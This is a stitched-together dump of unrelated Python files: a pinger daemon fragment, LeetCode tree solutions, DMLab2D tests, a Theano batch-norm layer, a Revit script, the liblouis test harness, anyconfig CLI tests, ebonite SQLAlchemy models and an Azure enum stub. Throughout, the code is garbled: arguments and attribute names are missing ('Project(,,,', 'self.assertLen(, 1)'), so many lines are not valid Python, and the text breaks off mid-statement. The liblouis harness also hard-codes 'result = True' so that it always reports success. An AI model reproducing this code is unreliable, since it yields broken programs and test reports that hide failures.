LOG.debug('Send heartbeat...') try: origin = '{}/{}'.format('pinger', platform.uname()[1]) self.api.heartbeat(origin, tags=[__version__]) except Exception as e: LOG.warning('Failed to send heartbeat: %s', e) time.sleep(LOOP_EVERY)'Ping queue length is %d', self.queue.qsize()) except (KeyboardInterrupt, SystemExit): self.shuttingdown = True'Shutdown request received...') self.running = False for i in range(SERVER_THREAD_COUNT): self.queue.put(None) w.join() def main(): pinger = PingerDaemon() if __name__ == '__main__': main()
<filename>Python3/ __________________________________________________________________________________________________ sample 24 ms submission # Definition for a binary tree node. # class TreeNode: # def __init__(self, x): # self.val = x # self.left = None # self.right = None from collections import deque class Solution: def leafSimilar(self, root1: TreeNode, root2: TreeNode) -> bool: def get_leafs(root): if not root: return [] if not root.left and not root.right: return [root.val] return get_leafs(root.left) + get_leafs(root.right) return get_leafs(root1) == get_leafs(root2) __________________________________________________________________________________________________ sample 12908 kb submission # Definition for a binary tree node. # class TreeNode: # def __init__(self, x): # self.val = x # self.left = None # self.right = None class Solution: def leafSimilar(self, root1: TreeNode, root2: TreeNode) -> bool: return self.getleaf(root1) == self.getleaf(root2) def getleaf(self, root): if not root: return [] stack = [root] out = [] while root.left: stack.append(root.left) root = root.left while stack: p = stack.pop() if not p.left and not p.right: out.append(p.val) if p.right: stack.append(p.right) p = p.right while p.left: stack.append(p.left) p = p.left return out __________________________________________________________________________________________________
<reponame>lesteve/tensorwatch<gh_stars>1000+ import tensorwatch as tw import time w = tw.Watcher(filename='test.log') s = w.create_stream(name='my_metric') #w.make_notebook() for i in range(1000): s.write((i, i*i)) time.sleep(1)
# Copyright 2019 The DMLab2D Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for dmlab2d.dmlab2d.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl.testing import absltest from dm_env import test_utils import numpy as np import dmlab2d from dmlab2d import runfiles_helper class Dmlab2dDmEnvTest(test_utils.EnvironmentTestMixin, absltest.TestCase): def make_object_under_test(self): lab2d = dmlab2d.Lab2d(runfiles_helper.find(), {'levelName': 'examples/level_api'}) return dmlab2d.Environment(lab2d, lab2d.observation_names(), 0) class Dmlab2DTest(absltest.TestCase): def _create_env(self, extra_settings=None): settings = extra_settings.copy() if extra_settings else {} settings['levelName'] = 'examples/level_api' return dmlab2d.Lab2d(runfiles_helper.find(), settings) def test_lab2d_environment_name(self): self.assertEqual(self._create_env().name(), 'dmlab2d') def test_lab2d_observation_names(self): env = self._create_env() self.assertEqual(env.observation_names(), ['VIEW' + str(i) for i in range(1, 6)]) def test_lab2d_observation_spec(self): env = self._create_env() self.assertEqual( env.observation_spec('VIEW1'), { 'dtype': np.dtype('uint8'), 'shape': (1,) }) self.assertEqual( env.observation_spec('VIEW2'), { 'dtype': np.dtype('double'), 'shape': (2,) }) self.assertEqual( env.observation_spec('VIEW3'), { 'dtype': np.dtype('int32'), 'shape': (3,) }) self.assertEqual( env.observation_spec('VIEW4'), { 'dtype': np.dtype('int64'), 'shape': (4,) }) # Text is stored in objects. self.assertEqual( env.observation_spec('VIEW5'), { 'dtype': np.dtype('O'), 'shape': () }) def test_lab2d_action_spec(self): env = self._create_env() self.assertEqual(env.action_discrete_names(), ['REWARD_ACT']) self.assertEqual( env.action_discrete_spec('REWARD_ACT'), { 'min': 0, 'max': 4 }) self.assertEqual(env.action_continuous_names(), ['OBSERVATION_ACT']) self.assertEqual( env.action_continuous_spec('OBSERVATION_ACT'), { 'min': -5, 'max': 5 }) self.assertEqual(env.action_text_names(), ['LOG_EVENT']) def test_lab2d_start_environment(self): env = self._create_env() env.start(episode=0, seed=0) def test_lab2d_events_start(self): env = self._create_env() env.start(episode=0, seed=0) events = self.assertLen(events, 1) event_name, observations = events[0] self.assertEqual(event_name, 'start') self.assertLen(observations, 1) np.testing.assert_array_equal(observations[0], [1, 2, 3]) def test_lab2d_events_cleared_after_advance_not_read(self): env = self._create_env() env.start(episode=0, seed=0) self.assertLen(, 1) self.assertLen(, 1) env.advance() self.assertEmpty( def test_lab2d_observe(self): env = self._create_env() env.start(episode=0, seed=0) np.testing.assert_array_equal(env.observation('VIEW1'), [1]) np.testing.assert_array_equal(env.observation('VIEW2'), [1, 2]) np.testing.assert_array_equal(env.observation('VIEW3'), [1, 2, 3]) np.testing.assert_array_equal(env.observation('VIEW4'), [1, 2, 3, 4]) self.assertEqual(env.observation('VIEW5'), b'') def test_lab2d_ten_steps_terminate_environment(self): env = self._create_env() env.start(episode=0, seed=0) for _ in range(9): self.assertEqual(env.advance()[0], dmlab2d.RUNNING) self.assertEqual(env.advance()[0], dmlab2d.TERMINATED) def test_lab2d_settings_environment(self): env = self._create_env({'steps': '5'}) env.start(episode=0, seed=0) for _ in range(4): self.assertEqual(env.advance()[0], dmlab2d.RUNNING) self.assertEqual(env.advance()[0], dmlab2d.TERMINATED) def test_lab2d_properties_environment(self): env = self._create_env({'steps': '5'}) properties = env.list_property('') self.assertLen(properties, 1) self.assertEqual(properties[0], ('steps', dmlab2d.PropertyAttribute.READABLE_WRITABLE)) self.assertEqual(env.read_property('steps'), '5') env.write_property('steps', '3') self.assertEqual(env.read_property('steps'), '3') env.start(episode=0, seed=0) for _ in range(2): self.assertEqual(env.advance()[0], dmlab2d.RUNNING) self.assertEqual(env.advance()[0], dmlab2d.TERMINATED) def test_lab2d_act_discrete(self): env = self._create_env({'steps': '5'}) env.start(episode=0, seed=0) env.act_discrete(np.array([2], np.dtype('int32'))) _, reward = env.advance() self.assertEqual(reward, 2) def test_lab2d_act_continuous(self): env = self._create_env({'steps': '5'}) env.start(episode=0, seed=0) np.testing.assert_array_equal(env.observation('VIEW3'), [1, 2, 3]) env.act_continuous([10]) env.advance() np.testing.assert_array_equal(env.observation('VIEW3'), [11, 12, 13]) def test_lab2d_act_text(self): env = self._create_env({'steps': '5'}) env.start(episode=0, seed=0) view = env.observation('VIEW5') self.assertEqual(view, b'') env.act_text(['Hello']) env.advance() view = env.observation('VIEW5') self.assertEqual(view, b'Hello') def test_lab2d_invalid_setting(self): with self.assertRaises(ValueError): self._create_env({'missing': '5'}) def test_lab2d_bad_action_spec_name(self): env = self._create_env() with self.assertRaises(KeyError): env.action_discrete_spec('bad_key') with self.assertRaises(KeyError): env.action_continuous_spec('bad_key') def test_lab2d_bad_observation_spec_name(self): env = self._create_env() with self.assertRaises(KeyError): env.observation_spec('bad_key') def test_lab2d_observe_before_start(self): env = self._create_env() with self.assertRaises(RuntimeError): env.observation('VIEW1') def test_lab2d_act_before_start(self): env = self._create_env() with self.assertRaises(RuntimeError): env.act_discrete([0]) with self.assertRaises(RuntimeError): env.act_continuous([0]) with self.assertRaises(RuntimeError): env.act_text(['']) def test_lab2d_act_bad_shape(self): env = self._create_env() env.start(0, 0) with self.assertRaises(ValueError): env.act_discrete([0, 1]) with self.assertRaises(ValueError): env.act_continuous([0, 1]) def test_lab2d_advance_after_episode_ends(self): env = self._create_env({'steps': '2'}) env.start(0, 0) self.assertEqual(env.advance()[0], dmlab2d.RUNNING) self.assertEqual(env.advance()[0], dmlab2d.TERMINATED) with self.assertRaises(RuntimeError): env.advance() def test_lab2d_missing_properties(self): env = self._create_env({'steps': '5'}) with self.assertRaises(KeyError): env.list_property('missing') with self.assertRaises(KeyError): env.read_property('missing') with self.assertRaises(KeyError): env.write_property('missing', '10') def test_lab2d_invalid_ops_properties(self): env = self._create_env({'steps': '5'}) with self.assertRaises(ValueError): env.list_property('steps') with self.assertRaises(ValueError): env.write_property('steps', 'mouse') if __name__ == '__main__': absltest.main()
<gh_stars>100-1000 from mozi.layers.template import Template from mozi.utils.theano_utils import shared_zeros, sharedX, shared_ones from mozi.weight_init import UniformWeight import theano.tensor as T import theano class BatchNormalization(Template): def __init__(self, dim, layer_type, gamma_init=UniformWeight(), short_memory=0.01): ''' REFERENCE: Batch Normalization: Accelerating Deep Network Training by Reducing Internal Covariate Shift PARAMS: short_memory: short term memory y_t is the latest value, the moving average x_tp1 is calculated as x_tp1 = memory * y_t + (1-memory) * x_t, the larger the short term memory, the more weight is put on contempory. layer_type: fc or conv epsilon: denominator min value for preventing division by zero in computing std dim: for fc layers, shape is the layer dimension, for conv layers, shape is the number of feature maps ''' assert layer_type in ['fc', 'conv'] self.layer_type = layer_type self.epsilon = 1e-6 self.dim = dim self.mem = short_memory if self.layer_type == 'fc': input_shape = (1, dim) self.broadcastable = (True, False) elif self.layer_type == 'conv': input_shape = (1, dim, 1, 1) self.broadcastable = (True, False, True, True) self.gamma = gamma_init(input_shape, name='gamma') self.beta = shared_zeros(input_shape, name='beta') self.params = [self.gamma, self.beta] self.moving_mean = 0 self.moving_var = 1 def _train_fprop(self, state_below): if self.layer_type == 'fc': miu = state_below.mean(axis=0) var = T.mean((state_below - miu)**2, axis=0) elif self.layer_type == 'conv': miu = state_below.mean(axis=(0,2,3), keepdims=True) var = T.mean((state_below - miu)**2, axis=(0,2,3), keepdims=True) self.moving_mean = self.mem * miu + (1-self.mem) * self.moving_mean self.moving_var = self.mem * var + (1-self.mem) * self.moving_var Z = (state_below - self.moving_mean) / T.sqrt(self.moving_var + self.epsilon) gamma = T.patternbroadcast(self.gamma, self.broadcastable) beta = T.patternbroadcast(self.beta, self.broadcastable) return gamma * Z + beta def _test_fprop(self, state_below): Z = (state_below - self.moving_mean) / T.sqrt(self.moving_var + self.epsilon) gamma = T.patternbroadcast(self.gamma, self.broadcastable) beta = T.patternbroadcast(self.beta, self.broadcastable) return gamma * Z + beta def _layer_stats(self, state_below, layer_output): return [('moving_mean', T.mean(self.moving_mean)), ('moving_std', T.mean(self.moving_var)), ('gamma_mean', T.mean(self.gamma)), ('beta_mean', T.mean(self.beta)), ('gamma_max', T.max(self.gamma))] # class LRN(Template): # """ # Adapted from pylearn2 # Local Response Normalization # """ # # def __init__(self, n=5, alpha=0.0001, beta=0.75, k=2): # super(LRN, self).__init__() # self.n = n # self.alpha = alpha # self.beta = beta # self.k = k # assert self.n % 2 == 1, 'only odd n is supported' # # def _train_fprop(self, state_below): # half = self.n / 2 # sq = T.sqr(state_below) # b, ch, r, c = state_below.shape # extra_channels = T.alloc(0., b, ch + 2*half, r, c) # sq = T.set_subtensor(extra_channels[:,half:half+ch,:,:], sq) # scale = self.k # # for i in xrange(self.n): # scale += self.alpha * sq[:,i:i+ch,:,:] # # scale = scale ** self.beta # return state_below / scale # # def _test_fprop(self, state_below): # return self._train_fprop(state_below)
<gh_stars>100-1000 import clr clr.AddReference('RevitAPI') from Autodesk.Revit.DB import * mats = UnwrapElement(IN[0]) colorlist = list() glowlist = list() classlist = list() shinylist = list() smoothlist = list() translist = list() for mat in mats: colorlist.append(mat.Color) if mat.Glow: glowlist.append(True) else: glowlist.append(False) classlist.append(mat.MaterialClass) shinylist.append(mat.Shininess) smoothlist.append(mat.Smoothness) translist.append(mat.Transparency) OUT = (classlist,colorlist,glowlist,shinylist,smoothlist,translist)
#!/usr/bin/env python # -*- coding: utf-8 -*- # Liblouis test harness # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Library General Public # License as published by the Free Software Foundation; either # version 3 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Library General Public License for more details. # # You should have received a copy of the GNU Library General Public # License along with this library; if not, write to the # Free Software Foundation, Inc., Franklin Street, Fifth Floor, # Boston MA 02110-1301 USA. # # Copyright (c) 2012, liblouis team, <NAME>. """Liblouis test harness: Please see the liblouis documentation for information of how to add a new harness or more tests for your braille table. @author: <NAME> <<EMAIL>> @author: <NAME> <<EMAIL>> @author: <NAME> <<EMAIL>> """ import json import os import sys import traceback from glob import iglob from louis import translate, backTranslateString, hyphenate from louis import noContractions, compbrlAtCursor, dotsIO, comp8Dots, pass1Only, compbrlLeftCursor, otherTrans, ucBrl try: from nose.plugins import Plugin from nose import run except ImportError: sys.stderr.write("The harness tests require nose. Skipping...\n") sys.exit(0) ### Nosetest plugin for controlling the output format. ### class Reporter(Plugin): name = 'reporter' def __init__(self): super(Reporter, self).__init__() self.res = [] = None def setOutputStream(self, stream): # grab for own use = stream # return dummy stream class dummy: def write(self, *arg): pass def writeln(self, *arg): pass def flush(self): pass d = dummy() return d def addError(self, test, err): exctype, value, tb = err errMsg = ''.join(traceback.format_exception(exctype, value, tb)) self.res.append("--- Error: ---\n%s\n--- end ---\n" % errMsg) def addFailure(self, test, err): exctype, value, tb = err #errMsg = ''.join(traceback.format_exception(exctype, value, None)) self.res.append("%s\n" % value) def finalize(self, result): failures=len(result.failures) errors=len(result.errors) total=result.testsRun percent_string = " ({percent}% success)".format(percent=round((total-failures-errors+0.0)/total*100,2)) if total > 0 else "" self.res.append("Ran {total} tests{percent_string}, with {failures} failures and {errors} errors.\n".format(total=total, percent_string=percent_string, failures=failures, errors=errors))"\n".join(self.res)) ### End of nosetest plugin for controlling the output format. ### PY2 = sys.version_info[0] == 2 def u(a): if PY2: return a.encode("utf-8") return a modes = { 'noContractions': noContractions, 'compbrlAtCursor': compbrlAtCursor, 'dotsIO': dotsIO, 'comp8Dots': comp8Dots, 'pass1Only': pass1Only, 'compbrlLeftCursor': compbrlLeftCursor, 'otherTrans': otherTrans, 'ucBrl': ucBrl } def showCurPos(length, pos1, marker1="^", pos2=None, marker2="*"): """A helper function to make a string to show the position of the given cursor.""" display = [" "] *length display[pos1] = marker1 if pos2: display[pos2] = marker2 return "".join(display) class BrailleTest(): def __init__(self, harnessName, tables, input, output, outputUniBrl=False, mode=0, cursorPos=None, brlCursorPos=None, testmode='translate', comment=[]): self.harnessName = harnessName self.tables = tables if outputUniBrl: self.tables.insert(0, 'unicode.dis') self.input = input self.expectedOutput = output self.mode = mode if not mode else modes[mode] self.cursorPos = cursorPos self.expectedBrlCursorPos = brlCursorPos self.comment = comment self.testmode = testmode def __str__(self): return "%s" % self.harnessName def hyphenateword(self, tables, word, mode): # FIXME: liblouis currently crashes if we dont add space at end of the word, probably due to a counter running past the end of the string. # medium/longterm this hack should be removed, and the root of the problem found/resolved. hyphen_mask=hyphenate(tables, word+' ', mode) # FIXME: why on python 2 do we need to remove the last item, and on python3 it is needed? # i.e. in python2 word and hyphen_mask not of the same length. if PY2: return "".join( map(lambda a,b: "-"+a if b=='1' else a, word, hyphen_mask)[:-1] ) else: return "".join( list(map(lambda a,b: "-"+a if b=='1' else a, word, hyphen_mask)) ) def check_translate(self): if self.cursorPos is not None: tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode, cursorPos=self.cursorPos) else: tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode) template = "%-25s '%s'" tBrlCurPosStr = showCurPos(len(tBrl), tBrlCurPos) report = [ "--- Braille Difference Failure: %s ---" % self.__str__(), template % ("comment:", "".join(self.comment)), template % ("input:", self.input), template % ("expected brl:", self.expectedOutput), template % ("actual brl:", tBrl), "--- end ---", ] assert tBrl == self.expectedOutput, u("\n".join(report)) def check_backtranslate(self): backtranslate_output = backTranslateString(self.tables, self.input, None, mode=self.mode) template = "%-25s '%s'" report = [ "--- Backtranslate failure: %s ---" % self.__str__(), template % ("comment:", "".join(self.comment)), template % ("input:", self.input), template % ("expected text:", self.expectedOutput), template % ("actual backtranslated text:", backtranslate_output), "--- end ---", ] assert backtranslate_output == self.expectedOutput, u("\n".join(report)) def check_cursor(self): tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode, cursorPos=self.cursorPos) template = "%-25s '%s'" etBrlCurPosStr = showCurPos(len(tBrl), tBrlCurPos, pos2=self.expectedBrlCursorPos) report = [ "--- Braille Cursor Difference Failure: %s ---" %self.__str__(), template % ("comment:", "".join(self.comment)), template % ("input:", self.input), template % ("received brl:", tBrl), template % ("BRLCursorAt %d expected %d:" %(tBrlCurPos, self.expectedBrlCursorPos), etBrlCurPosStr), "--- end ---" ] assert tBrlCurPos == self.expectedBrlCursorPos, u("\n".join(report)) def check_hyphenate(self): hyphenated_word = self.hyphenateword(self.tables, self.input, mode=self.mode) template = "%-25s '%s'" report = [ "--- Hyphenation failure: %s ---" % self.__str__(), template % ("input:", self.input), template % ("expected hyphenated word:", self.expectedOutput), template % ("actual hyphenated word:", hyphenated_word), "--- end ---", ] assert hyphenated_word == self.expectedOutput, u("\n".join(report)) def test_allCases(): if 'HARNESS_DIR' in os.environ: # we assume that if HARNESS_DIR is set that we are invoked from # the Makefile, i.e. all the paths to the Python test files and # the test tables are set correctly. harness_dir = os.environ['HARNESS_DIR'] else: # we are not invoked via the Makefile, i.e. we have to set up the # paths (LOUIS_TABLEPATH) manually. harness_dir = "." # make sure local test braille tables are found os.environ['LOUIS_TABLEPATH'] = '../tables,../../tables' testfiles=[] if len(sys.argv)>1: # grab the test files from the arguments for test_file in sys.argv[1:]: testfiles.extend(iglob(os.path.join(harness_dir, test_file))) else: # Process all *_harness.txt files in the harness directory. testfiles=iglob(os.path.join(harness_dir, '*_harness.txt')) for harness in testfiles: f = open(harness, 'r') try: harnessModule = json.load(f, encoding="UTF-8") except ValueError as e: raise ValueError("%s doesn't look like a harness file, %s" %(harness, e.message)) f.close() tableList = [] if isinstance(harnessModule['tables'], list): tableList.extend(harnessModule['tables']) else: tableList.append(harnessModule['tables']) origflags = {'testmode':'translate'} for section in harnessModule['tests']: flags = origflags.copy() flags.update(section.get('flags', {})) for testData in section['data']: test = flags.copy() testTables = tableList[:] test.update(testData) bt = BrailleTest(harness, testTables, **test) if test['testmode'] == 'translate': yield bt.check_translate if 'cursorPos' in test: yield bt.check_cursor if test['testmode'] == 'backtranslate': yield bt.check_backtranslate if test['testmode'] == 'hyphenate': yield bt.check_hyphenate if __name__ == '__main__': result = run(addplugins=[Reporter()], argv=['-v', '--with-reporter', sys.argv[0]], defaultTest=__name__) # FIXME: Ideally the harness tests should return the result of the # tests. However since there is no way to mark a test as expected # failure ATM we would have to disable a whole file of tests. So, # for this release we will pretend all tests succeeded and will # add a @expected_test feature for the next release. See also # result = True sys.exit(0 if result else 1)
# # Copyright (C) 2013 - 2021 <NAME> <<EMAIL>> # License: MIT # # pylint: disable=missing-docstring """test cases for anyconfig.cli module. """ import contextlib import io import pathlib import sys import tempfile import unittest import anyconfig.api import anyconfig.cli as TT from .. import base from . import collectors, datatypes def make_args(_self, tdata): """Make arguments to run cli.main. """ return ['anyconfig_cli'] + tdata.opts + [str(tdata.inp_path)] class BaseTestCase(unittest.TestCase): """Base Test case. """ collector = collectors.Collector() make_args = make_args def setUp(self): if self.collector: self.collector.init() def post_checks(self, tdata, *args, **kwargs): """Placeholder to do more post checks. """ pass def _run_main(self, tdata): """Wrapper for cli.main.""" args = self.make_args(tdata) if tdata.outname: # Running cli.main will output files. self.assertTrue( tdata.ref is not None, 'No reference data was given, {tdata!r}' ) with tempfile.TemporaryDirectory() as tdir: opath = pathlib.Path(tdir) / tdata.outname # Run anyconfig.cli.main with arguments. TT.main(args + ['-o', str(opath)]) if tdata.exp.exit_code_matches and tdata.exp.exit_code == 0: self.assertTrue(opath.exists(), str(opath)) try: odata = anyconfig.api.load(opath, **tdata.oo_opts) except anyconfig.api.UnknownFileTypeError: odata = anyconfig.api.load(opath, ac_parser='json') self.assertEqual(odata, tdata.ref, repr(tdata)) self.post_checks(tdata, opath) else: # Likewise but without -o <output_path> option. TT.main(args) self.post_checks(tdata) sys.exit(0) def run_main(self, tdata) -> None: """ Run anyconfig.cli.main and check if the exit code was expected one. """ expected: datatypes.Expected = tdata.exp with self.assertRaises(expected.exception, msg=repr(tdata)) as ctx: with contextlib.redirect_stdout(io.StringIO()) as stdout: with contextlib.redirect_stderr(io.StringIO()) as stderr: self._run_main(tdata) exc = ctx.exception self.assertTrue(isinstance(exc, expected.exception)) ecode = getattr(exc, 'error_code', getattr(exc, 'code', 1)) if expected.exit_code_matches: self.assertEqual(ecode, expected.exit_code, f'{tdata!r}') else: self.assertNotEqual(ecode, expected.exit_code, f'{tdata!r}') if expected.words_in_stdout: msg = stdout.getvalue() self.assertTrue(expected.words_in_stdout in msg, msg) if expected.words_in_stderr: err = stderr.getvalue() self.assertTrue(expected.words_in_stderr in err, err) def test_runs_for_datasets(self) -> None: if self.collector and self.collector.initialized: if self.collector.kind == base.TDataCollector.kind: return for tdata in self.collector.each_data(): self.run_main(tdata) class NoInputTestCase(BaseTestCase): """Test cases which does not require inputs. """ def make_args(self, tdata): # pylint: disable=no-self-use """Make arguments to run cli.main. """ return ['anyconfig_cli'] + tdata.opts # vim:sw=4:ts=4:et:
from abc import abstractmethod from typing import Any, Dict, Iterable, List, Optional, Type, TypeVar from pyjackson import dumps, loads from sqlalchemy import Column, DateTime, ForeignKey, Integer, String, Text, UniqueConstraint from sqlalchemy.ext.declarative import declarative_base from sqlalchemy.orm import relationship from ebonite.core.objects import DatasetType from ebonite.core.objects.artifacts import ArtifactCollection from ebonite.core.objects.core import (Buildable, EvaluationResults, EvaluationSet, Image, Model, Pipeline, PipelineStep, Project, RuntimeEnvironment, RuntimeInstance, Task) from ebonite.core.objects.dataset_source import DatasetSource from ebonite.core.objects.metric import Metric from ebonite.core.objects.requirements import Requirements SQL_OBJECT_FIELD = '_sqlalchemy_object' def json_column(): return Column(Text) def safe_loads(payload, as_class): return loads(payload, Optional[as_class]) def sqlobject(obj): return getattr(obj, SQL_OBJECT_FIELD, None) def update_attrs(obj, **attrs): for name, value in attrs.items(): setattr(obj, name, value) T = TypeVar('T') S = TypeVar('S', bound='Attaching') class Attaching: id = ... name = ... def attach(self, obj): setattr(obj, SQL_OBJECT_FIELD, self) return obj @classmethod def from_obj(cls: Type[S], obj: T, new=False) -> S: kwargs = cls.get_kwargs(obj) existing = sqlobject(obj) if not new and existing is not None: update_attrs(existing, **kwargs) return existing return cls(**kwargs) @classmethod @abstractmethod def get_kwargs(cls, obj: T) -> dict: pass # pragma: no cover @abstractmethod def to_obj(self) -> T: pass # pragma: no cover Base = declarative_base() class SProject(Base, Attaching): __tablename__ = 'projects' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=True, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) tasks: Iterable['STask'] = relationship("STask", back_populates="project") def to_obj(self) -> Project: p = Project(,,, creation_date=self.creation_date) for task in self.tasks: p._tasks.add(task.to_obj()) return self.attach(p) @classmethod def get_kwargs(cls, project: Project) -> dict: return dict(,,, creation_date=project.creation_date, tasks=[STask.from_obj(t) for t in project.tasks.values()]) class STask(Base, Attaching): __tablename__ = 'tasks' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=False, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) project_id = Column(Integer, ForeignKey(''), nullable=False) project = relationship("SProject", back_populates="tasks") models: Iterable['SModel'] = relationship("SModel", back_populates="task") pipelines: Iterable['SPipeline'] = relationship("SPipeline", back_populates='task') images: Iterable['SImage'] = relationship("SImage", back_populates='task') datasets = Column(Text) metrics = Column(Text) evaluation_sets = Column(Text) __table_args__ = (UniqueConstraint('name', 'project_id', name='tasks_name_and_ref'),) def to_obj(self) -> Task: task = Task(,,, creation_date=self.creation_date, project_id=self.project_id, datasets=safe_loads(self.datasets, Dict[str, DatasetSource]), metrics=safe_loads(self.metrics, Dict[str, Metric]), evaluation_sets=safe_loads(self.evaluation_sets, Dict[str, EvaluationSet])) for model in self.models: task._models.add(model.to_obj()) for pipeline in self.pipelines: task._pipelines.add(pipeline.to_obj()) for image in self.images: task._images.add(image.to_obj()) return self.attach(task) @classmethod def get_kwargs(cls, task: Task) -> dict: return dict(,,, creation_date=task.creation_date, project_id=task.project_id, models=[SModel.from_obj(m) for m in task.models.values()], images=[SImage.from_obj(i) for i in task.images.values()], pipelines=[SPipeline.from_obj(p) for p in task.pipelines.values()], datasets=dumps(task.datasets), metrics=dumps(task.metrics), evaluation_sets=dumps(task.evaluation_sets)) class SModel(Base, Attaching): __tablename__ = 'models' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=False, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) wrapper = Column(Text) artifact = Column(Text) requirements = Column(Text) description = Column(Text) params = Column(Text) task_id = Column(Integer, ForeignKey(''), nullable=False) task = relationship("STask", back_populates="models") evaluations = Column(Text) __table_args__ = (UniqueConstraint('name', 'task_id', name='models_name_and_ref'),) def to_obj(self) -> Model: model = Model(, wrapper_meta=safe_loads(self.wrapper, dict),, creation_date=self.creation_date, artifact=safe_loads(self.artifact, ArtifactCollection), requirements=safe_loads(self.requirements, Requirements), description=self.description, params=safe_loads(self.params, Dict[str, Any]),, task_id=self.task_id, evaluations=safe_loads(self.evaluations, Dict[str, EvaluationResults])) return self.attach(model) @classmethod def get_kwargs(cls, model: Model) -> dict: return dict(,,, creation_date=model.creation_date, wrapper=dumps(model.wrapper_meta), artifact=dumps(model.artifact), requirements=dumps(model.requirements), description=model.description, params=dumps(model.params), task_id=model.task_id, evaluations=dumps(model.evaluations)) class SPipeline(Base, Attaching): __tablename__ = 'pipelines' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=False, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) steps = Column(Text) input_data = Column(Text) output_data = Column(Text) task_id = Column(Integer, ForeignKey(''), nullable=False) task = relationship("STask", back_populates="pipelines") evaluations = Column(Text) __table_args__ = (UniqueConstraint('name', 'task_id', name='pipelines_name_and_ref'),) def to_obj(self) -> Pipeline: pipeline = Pipeline(, steps=safe_loads(self.steps, List[PipelineStep]), input_data=safe_loads(self.input_data, DatasetType), output_data=safe_loads(self.output_data, DatasetType),, creation_date=self.creation_date,, task_id=self.task_id, evaluations=safe_loads(self.evaluations, EvaluationResults)) return self.attach(pipeline) @classmethod def get_kwargs(cls, pipeline: Pipeline) -> dict: return dict(,,, creation_date=pipeline.creation_date, steps=dumps(pipeline.steps), input_data=dumps(pipeline.input_data), output_data=dumps(pipeline.output_data), task_id=pipeline.task_id, evaluations=dumps(pipeline.evaluations)) class SImage(Base, Attaching): __tablename__ = 'images' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=False, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) task_id = Column(Integer, ForeignKey(''), nullable=False) task = relationship("STask", back_populates="images") environment_id = Column(Integer, ForeignKey(''), nullable=False) params = Column(Text) source = Column(Text) __table_args__ = (UniqueConstraint('name', 'task_id', name='image_name_and_ref'),) def to_obj(self) -> Image: image = Image(,, creation_date=self.creation_date,, task_id=self.task_id, params=safe_loads(self.params, Image.Params), source=safe_loads(self.source, Buildable), environment_id=self.environment_id) return self.attach(image) @classmethod def get_kwargs(cls, image: Image) -> dict: return dict(,,, creation_date=image.creation_date, task_id=image.task_id, params=dumps(image.params), source=dumps(image.source), environment_id=image.environment_id) class SRuntimeEnvironment(Base, Attaching): __tablename__ = 'environments' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=True, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) params = Column(Text) def to_obj(self) -> RuntimeEnvironment: environment = RuntimeEnvironment(,, creation_date=self.creation_date,, params=safe_loads(self.params, RuntimeEnvironment.Params)) return self.attach(environment) @classmethod def get_kwargs(cls, environment: RuntimeEnvironment) -> dict: return dict(,,, creation_date=environment.creation_date, params=dumps(environment.params)) class SRuntimeInstance(Base, Attaching): __tablename__ = 'instances' id = Column(Integer, primary_key=True, autoincrement=True) name = Column(String, unique=False, nullable=False) author = Column(String, unique=False, nullable=False) creation_date = Column(DateTime, unique=False, nullable=False) image_id = Column(Integer, ForeignKey(''), nullable=False) environment_id = Column(Integer, ForeignKey(''), nullable=False) params = Column(Text) __table_args__ = (UniqueConstraint('name', 'image_id', 'environment_id', name='instance_name_and_ref'),) def to_obj(self) -> RuntimeInstance: instance = RuntimeInstance(,, creation_date=self.creation_date,, image_id=self.image_id, environment_id=self.environment_id, params=safe_loads(self.params, RuntimeInstance.Params)) return self.attach(instance) @classmethod def get_kwargs(cls, instance: RuntimeInstance) -> dict: return dict(,,, creation_date=instance.creation_date, image_id=instance.image_id, environment_id=instance.environment_id, params=dumps(instance.params))
<filename>sdk/machinelearning/azure-mgmt-machinelearningservices/azure/mgmt/machinelearningservices/models/ # coding=utf-8 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is regenerated. # -------------------------------------------------------------------------- from enum import Enum, EnumMeta from six import with_metaclass class _CaseInsensitiveEnumMeta(EnumMeta): def __getitem__(self, name): return super().__getitem__(name.upper()) def __getattr__(cls, name): """Return the enum member matching `name` We use __getattr__ instead of descriptors or inserting into the enum class' __dict__ in order to support `name` and `value` being both properties for enum members (which live in the class' __dict__) and enum members themselves. """ try: return cls._member_map_[name.upper()] except KeyError: raise AttributeError(name) class AllocationState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)): """Allocation state of the compute. Possible values are: steady - Indicates that the compute is not resizing. There are no changes to the number of compute nodes in the compute in progress. A compute enters this state when it is created and when no operations are being performed on the compute to change the number of compute nodes. resizing - Indicates that the compute is resizing; that is, compute nodes are being added to or removed from the compute. """ STEADY = 